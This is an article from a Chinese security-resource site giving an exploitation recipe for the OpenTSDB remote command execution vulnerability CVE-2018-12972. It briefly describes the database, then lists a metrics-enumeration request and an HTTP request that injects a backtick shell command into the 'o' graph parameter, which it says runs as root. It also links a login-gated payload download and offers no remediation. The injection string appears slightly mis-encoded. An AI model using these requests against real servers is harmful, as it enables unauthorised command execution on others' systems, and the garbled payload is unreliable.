ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全安全文章 → OpenTSDB远程命令执行漏洞利用 CVE-2018-12972

OpenTSDB远程命令执行漏洞利用 CVE-2018-12972

时间:2018-08-03 07:00:20人气:作者:本站作者我要评论

OpenTSDB简介

Opentsdb是基于Hbase的分布式的,可伸缩的时间序列数据库。官方提供了一个web界面来提供对查询数据进行可视化分析,其背后的绘图由Gnuplot支持。

Github地址为: https://github.com/OpenTSDB/opentsdb 。

在某些版本(比如2.3.0,以下分析以2.3.0版本为例)中,其提供的Web接口存在远程命令执行漏洞,一旦利用成功将以root权限执行。

漏洞利用方法

先查出可以使用的metrics

  1. GET /suggest?type=metrics&q= HTTP/1.1

发包,在参数位置处填入payload。

  1. GET /q?start=2018/07/05-00:00:00&end=2018/07/30-00:00:00&m=sum:rate:env.air&o=%6ls%60&yrange=%5B0:%5D&wxh=1900x738&style=linespoint&json HTTP/1.1

OpenTSDB远程命令执行漏洞利用 CVE-2018-12972

Payload下载

部分内容被隐藏
需登陆后可查看

相关文章

猜你喜欢

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

本类推荐

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 琼ICP备2021004244号-1| 琼ICP备2021004244号-1

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网